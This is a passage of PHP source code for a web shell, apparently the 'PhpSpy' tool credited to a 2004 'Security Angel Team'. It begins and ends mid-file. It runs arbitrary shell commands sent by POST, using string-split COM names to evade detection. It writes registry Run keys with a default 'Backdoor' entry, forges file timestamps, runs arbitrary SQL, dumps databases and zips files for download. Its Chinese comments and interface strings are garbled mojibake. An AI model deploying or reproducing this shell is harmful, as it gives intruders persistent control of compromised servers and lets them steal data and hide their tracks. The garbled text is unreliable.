// 硒俴SQL逄曆
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("杅擂踱蟀諉囮啖");
@mysql_select_db($dbname) or die("恁寁杅擂踱囮啖");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL逄曆傖髡硒俴!" : "堤渣: ".mysql_error();
mysql_close();
}
// 掘爺紱釬
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo "恁寁郗掘爺腔杅擂桶睿掘爺源宒!";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("杅擂踱蟀諉囮啖");
@mysql_select_db($dbname) or die("恁寁杅擂踱囮啖");
$table = array_flip($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "堤渣: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $filehandle);
fwrite($filehandle,"\n\n\n");
}
}
fclose($filehandle);
echo "杅擂踱眒傖髡掘爺善 <a href=\"".$path."\" target=\"_blank\">".$path."</a>";
mysql_close();
} else {
echo "掘爺囮啖,醴梓恅璃標岆瘁撿衄褫迡癹!";
}
}
}
}
// 湖婦狟婥 PS:恅璃怮湮褫夔準都鞣
// Thx : 苤豪
elseif($downrar) {
if (!empty($dl)) {
$dfiles="";
foreach ($dl AS $filepath=>$value) {
$dfiles.=$filepath.",";
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(",",$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
echo $code;
exit;
} else {
echo "恁寁猁湖婦狟婥腔恅璃!";
}
}
// Shell.Application 堍俴最唗
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "最唗眒冪傖髡硒俴!" : "最唗堍俴囮啖!";
}
// 脤艘PHP饜离統杅袨錶
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo "饜离統杅 ".$_POST['phpvarname']." 潰聆賦彆: ".getphpcfg($_POST['phpvarname'])."";
}
// 黍蛁聊桶
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// 迡蛁聊桶
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? "迡蛁聊桶翩硉傖髡!" : "迡 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 囮啖!";
}
// 刉壺蛁聊桶
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0') ? "刉壺蛁聊桶翩硉傖髡!" : "刉壺 ".$_POST['delregname']." 囮啖!";
}
else {
echo "掛最唗蚕 <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> 苤郪 angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] 黃蕾羲楷,褫婓 <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> 狟婥郔陔唳掛.";
}
echo "</b></p>\n";
/*===================== 硒俴紱釬 賦旰 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
?>
<tr bgcolor="#cccccc">
<td align="center" nowrap width="27%"><b>恅璃</b></td>
<td align="center" nowrap width="16%"><b>斐膘</b></td>
<td align="center" nowrap width="16%"><b>郔綴党蜊</b></td>
<td align="center" nowrap width="11%"><b>湮苤</b></td>
<td align="center" nowrap width="6%"><b>扽俶</b></td>
<td align="center" nowrap width="24%"><b>紱釬</b></td>
</tr>
<?php
// 醴翹蹈桶
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><dir></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap><a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','斕隅猁刉壺 $file 醴翹鎘? \\n\\n彆蜆醴翹準諾,森棒紱釬蔚頗刉壺蜆醴翹狟腔垀衄恅璃!','1')\">刉壺</a></td>\n";
echo "</tr>\n";
$dir_i++;
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">殿隙奻撰醴翹</a></td>\n";
echo "</tr>\n";
}
}
}
}// while
@closedir($dirs);
?>
<tr bgcolor="#cccccc">
<td colspan="6" height="5"></td>
</tr>
<FORM action="" method="POST">
<?
// 恅璃蹈桶
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath);
if($a=="0"){
$size=@filesize($filepath);
$size=$size/1024 ;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
} else {
$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
}
@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">";
echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
echo " <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
echo " <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\">狟婥</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">晤憮</a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','斕隅猁刉壺 $file 恅璃鎘?','2')\">刉壺</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">蜊靡</a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">奀潔</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}// while
@closedir($dirs);
$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','恁笢恅璃湖婦狟婥','','submit').'</td><td align="right">'.$dir_i.' 跺醴翹 / '.$file_i.' 跺恅璃</td></tr></table>','center',getrowbg(),'','','6');
echo "</FORM>\n";
echo "</table>\n";
}// end dir
elseif ($_GET['action'] == "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'陔膘/晤憮恅璃');
$tb->tdbody('絞恅璃: '.$tb->makeinput('editfilename',$filename).' 怀陔恅璃靡寀膘蕾陔恅璃');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile
elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
$tb->tableheader();
$tb->formheader($action,'党蜊恅璃靡');
$tb->makehidden('oldname',$dir."/".$nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('絞恅璃靡: '.basename($nowfile));
$tb->tdbody('蜊靡峈: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'党蜊恅璃扽俶');
$tb->tdbody('党蜊 '.$file.' 腔扽俶峈: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,'親癒恅璃郔綴党蜊奀潔');
$tb->tdbody("党蜊恅璃: ".$tb->makeinput('curfile',$file,'readonly')." ↙ 醴梓恅璃: ".$tb->makeinput('tarfile','剒沓俇淕繚噤摯恅璃靡'),'center','2','30');
$tb->makehidden('do','domodtime');
$tb->formfooter('','30');
$tb->formheader($action,'赻隅砱恅璃郔綴党蜊奀潔');
$tb->tdbody('<br><ul><li>衄虴腔奀潔期萎倰毓峓岆植跡輿哏笥奀潔 1901 爛 12 堎 13 陎拻 20:45:54 善 2038爛 1 堎 19 陎媼 03:14:07<br>(蜆跦擂 32 弇衄睫瘍淕杅腔郔苤硉睿郔湮硉奧懂)</li><li>佽隴: 01 善 30 眳潔, 奀 0 善 24 眳潔, 煦睿鏃 0 善 60 眳潔!</li></ul>','left');
$tb->tdbody('絞恅璃靡: '.$file);
$tb->makehidden('curfile',$file);
$tb->tdbody('党蜊峈: '.$tb->makeinput('year','1984','','text','4').' 爛 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 堎 '.$tb->makeinput('data','18','','text','2').' '.$tb->makeinput('hour','20','','text','2').' 奀 '.$tb->makeinput('minute','00','','text','2').' 煦 '.$tb->makeinput('second','00','','text','2').' 鏃','center','2','30');
$tb->makehidden('do','modmytime');
$tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "shell") {
$action = "??action=shell&dir=".urlencode($dir);
$tb->tableheader();
$tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
$tb->tdbody('拸隙珆堍俴最唗 ↙ 恅璃: '.$tb->makeinput('program',$program).' 統杅: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
$tb->makehidden('do','programrun');
echo "</form>\n";
}
echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
$tb->tdbody('枑尨:彆怀堤賦彆祥俇,膘祜參怀堤賦彆迡恅璃.涴欴褫眕腕善窒囀.');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->tdbody('恁寁硒俴滲杅: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 怀韜鍔: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
?>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} elseif ($execfunc=="wscript") {
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} else {
system($_POST['command']);
}
}
?></textarea></td>
</tr>
</form>
</table>
<?php
}//end shell
elseif ($_GET['action'] == "reg") {
$action = '?action=reg';
$regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
$registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
$delregname = $_POST['delregname'];
$tb->tableheader();
$tb->formheader($action,'黍蛁聊桶');
$tb->tdbody('瑩硉: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','黍','','submit'),'center','2','50');
echo "</form>";
$tb->formheader($action,'迡蛁聊桶');
$cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
$tb->tdbody('瑩硉: '.$tb->makeinput('writeregname',$registre,'','text','56').' 濬倰: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' 硉: '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','迡','','submit'),'center','2','50');
echo "</form>";
$tb->formheader($action,'刉壺蛁聊桶');
$tb->tdbody('瑩硉: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','刉壺','','submit'),'center','2','50');
echo "</form>";
$tb->tablefooter();
}//end reg
elseif ($_GET['action'] == "proxy") {
$action = '?action=proxy';
$tb->tableheader();
$tb->formheader($action,'婓盄測燴','proxyframe');
$tb->tdbody('<br><ul><li>蚚掛髡夔躺妗珋潠等腔 HTTP 測燴,祥頗珆尨妏蚚眈勤繚噤腔芞﹜蟈諉摯CSS欴宒桶.</li><li>蚚掛髡夔褫眕籵徹掛督昢銡擬醴梓URL,筍祥盓厥 SQL Injection 抻聆眕摯議虳杻忷趼睫.</li><li>蚚掛髡夔銡擬腔 URL,婓醴梓翋儂奻隱狟腔IP暮翹岆 : '.$_SERVER['REMOTE_ADDR'].'</li></ul>','left');
$tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','銡擬','','submit'),'center','1','40');
$tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="http://www.4ngel.net"></iframe>');
echo "</form>";
$tb->tablefooter();
}//end proxy
elseif ($_GET['action'] == "sql") {
$action = '?action=sql';
$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
$dbpassword = $_POST['dbpassword'];
$dbname = $_POST['dbname'];
$sql_query = $_POST['sql_query'];
$tb->tableheader();
$tb->formheader($action,'硒俴 SQL 逄曆');
$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','蟀諉','','submit'));
$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
$tb->makehidden('do','query');
$tb->formfooter('1','30');
}//end sql query
elseif ($_GET['action'] == "sqlbak") {
$action = '?action=sqlbak';
$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
$dbpassword = $_POST['dbpassword'];
$dbname = $_POST['dbname'];
$tb->tableheader();
$tb->formheader($action,'掘爺 MySQL 杅擂踱');
$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','蟀諉','','submit'));
@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
$tables = @mysql_list_tables($dbname);
while ($table = @mysql_fetch_row($tables)) {
$cachetables[$table[0]] = $table[0];
}
@mysql_free_result($tables);
if (empty($cachetables)) {
$tb->tdbody('<b>蠟羶衄蟀諉杅擂踱 or 絞杅擂踱羶衄睡杅擂桶</b>');
} else {
$tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">恁寁桶:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> 掘爺杅擂垀悵湔腔繚噤:</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download"> 眻諉狟婥善掛華 (巠磁杅擂講誕苤腔杅擂踱)</td></tr></table>');
$tb->makehidden('do','backupmysql');
$tb->formfooter('0','30');
}
$tb->tablefooter();
@mysql_close();
}//end sql backup
elseif ($_GET['action'] == "phpenv") {
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "祥埰勍奻換";
$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
if ($dis_func == "") {
$dis_func = "No";
}else {
$dis_func = str_replace(" ","<br>",$dis_func);
$dis_func = str_replace(",","<br>",$dis_func);
}
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
0 => array("督昢奀潔",date("Y爛m堎d h:i:s",time())),
1 => array("督昢郖靡","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
2 => array("督昢IP華硊",gethostbyname($_SERVER['SERVER_NAME'])),
3 => array("督昢紱釬炵苀",PHP_OS),
5 => array("督昢紱釬炵苀恅趼晤鎢",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6 => array("督昢賤祒竘",$_SERVER['SERVER_SOFTWARE']),
7 => array("Web督昢傷諳",$_SERVER['SERVER_PORT']),
8 => array("PHP堍俴源宒",strtoupper(php_sapi_name())),
9 => array("PHP唳掛",PHP_VERSION),
10 => array("堍俴衾假耀宒",getphpcfg("safemode")),
11 => array("督昢奪燴埜",$adminmail),
12 => array("掛恅璃繚噤",__FILE__),
13 => array("埰勍妏蚚 URL 湖羲恅璃 allow_url_fopen",getphpcfg("allow_url_fopen")),
14 => array("埰勍雄怓樓婥蟈諉踱 enable_dl",getphpcfg("enable_dl")),
15 => array("珆尨渣昫陓洘 display_errors",getphpcfg("display_errors")),
16 => array("赻雄隅砱擁曹講 register_globals",getphpcfg("register_globals")),
17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
18 => array("最唗郔嗣埰勍妏蚚囀湔講 memory_limit",getphpcfg("memory_limit")),
19 => array("POST郔湮趼誹杅 post_max_size",getphpcfg("post_max_size")),
20 => array("埰勍郔湮奻換恅璃 upload_max_filesize",$upsize),
21 => array("最唗郔酗堍俴奀潔 max_execution_time",getphpcfg("max_execution_time")."鏃"),
22 => array("掩輦蚚腔滲杅 disable_functions",$dis_func),
23 => array("phpinfo()",$phpinfo),
24 => array("醴遜衄諾豻諾潔diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
25 => array("芞倛揭燴 GD Library",getfun("imageline")),
26 => array("IMAP萇赽蚘璃炵苀",getfun("imap_close")),
27 => array("MySQL杅擂踱",getfun("mysql_close")),
28 => array("SyBase杅擂踱",getfun("sybase_close")),
29 => array("Oracle杅擂踱",getfun("ora_close")),
30 => array("Oracle 8 杅擂踱",getfun("OCILogOff")),
31 => array("PREL眈逄楊 PCRE",getfun("preg_match")),
32 => array("PDF恅紫盓厥",getfun("pdf_close")),
33 => array("Postgre SQL杅擂踱",getfun("pg_close")),
34 => array("SNMP厙釐奪燴衪祜",getfun("snmpget")),
35 => array("揤坫恅璃盓厥(Zlib)",getfun("gzclose")),
36 => array("XML賤昴",getfun("xml_set_object")),
37 => array("FTP",getfun("ftp_login")),
38 => array("ODBC杅擂踱蟀諉",getfun("odbc_close")),
39 => array("Session盓厥",getfun("session_start")),
40 => array("Socket盓厥",getfun("fsockopen")),
);
$tb->tableheader();
echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
$tb->tdbody('<b>脤艘PHP饜离統杅袨錶</b>','left','1','30','style="padding-left: 5px;"');
$tb->tdbody('怀饜离統杅(:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','脤艘','','submit'),'left','2','30','style="padding-left: 5px;"');
$tb->makehidden('do','viewphpvar');
echo "</form>\n";
$hp = array(0=> '督昢杻俶', 1=> 'PHP價掛杻俶', 2=> '郪璃盓厥袨錶');
for ($a=0;$a<3;$a++) {
$tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
?>
<tr class="secondalt">
<td>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<?php
if ($a==0) {
for($i=0;$i<=12;$i++) {
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
} elseif ($a == 1) {
for ($i=13;$i<=24;$i++) {
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
} elseif ($a == 2) {
for ($i=25;$i<=40;$i++) {
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}
?>
</table>
</td>
</tr>
<?php
}//for
echo "</table>";
}//end phpenv
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<tr>
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
<td align="right"><?php
debuginfo();
ob_end_flush();
?></td>
</tr>
</table>
</center>
</body>
</html>
<?php
/*======================================================
滲杅踱
======================================================*/
// 腎翻諳
function loginpage() {
?>
<style type="text/css">
input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="hidden" name="do" value="login">
<input type="submit" value="Login">
</form>
<?php
exit;
}//end loginpage()
// 珜醱覃彸陓洘
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
// 裁蛌砱趼睫
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 刉壺醴翹
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
return (@rmdir($deldir)) ? 1 : 0;
}
// 瓚剿黍迡錶
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
// 桶跡俴潔腔掖劓伎杸遙
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
// 鳳絞腔恅璃炵苀繚噤
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
// 潰脤PHP饜离統杅
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return "No";
break;
case 1:
return "Yes";
break;
default:
return $result;
break;
}
}
// 潰脤滲杅錶
function getfun($funName) {
return (false !== function_exists($funName)) ? "Yes" : "No";
}
// 揤坫湖婦濬
class PHPZip{
var $out='';
function PHPZip($dir) {
if (@function_exists('gzcompress')) {
$curdir = getcwd();
if (is_array($dir)) $filelist = $dir;
else{
$filelist=$this -> GetFileList($dir);//恅璃蹈桶
foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
}
if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
else chdir($curdir);
if (count($filelist)>0){
foreach($filelist as $filename){
if (is_file($filename)){
$fd = fopen ($filename, "r");
$content = @fread ($fd, filesize ($filename));
fclose ($fd);
if (is_array($dir)) $filename = basename($filename);
$this -> addFile($content, $filename);
}
}
$this->out = $this -> file();
chdir($curdir);
}
return 1;
}
else return 0;
}
// 鳳腕硌隅醴翹恅璃蹈桶
function GetFileList($dir){
static $a;
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if($file!='.' && $file!='..'){
$f=$dir .'/'. $file;
if(is_dir($f)) $this->GetFileList($f);
$a[]=$f;
}
}
closedir($dh);
}
}
return $a;
}
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
} // end if
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0) {
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
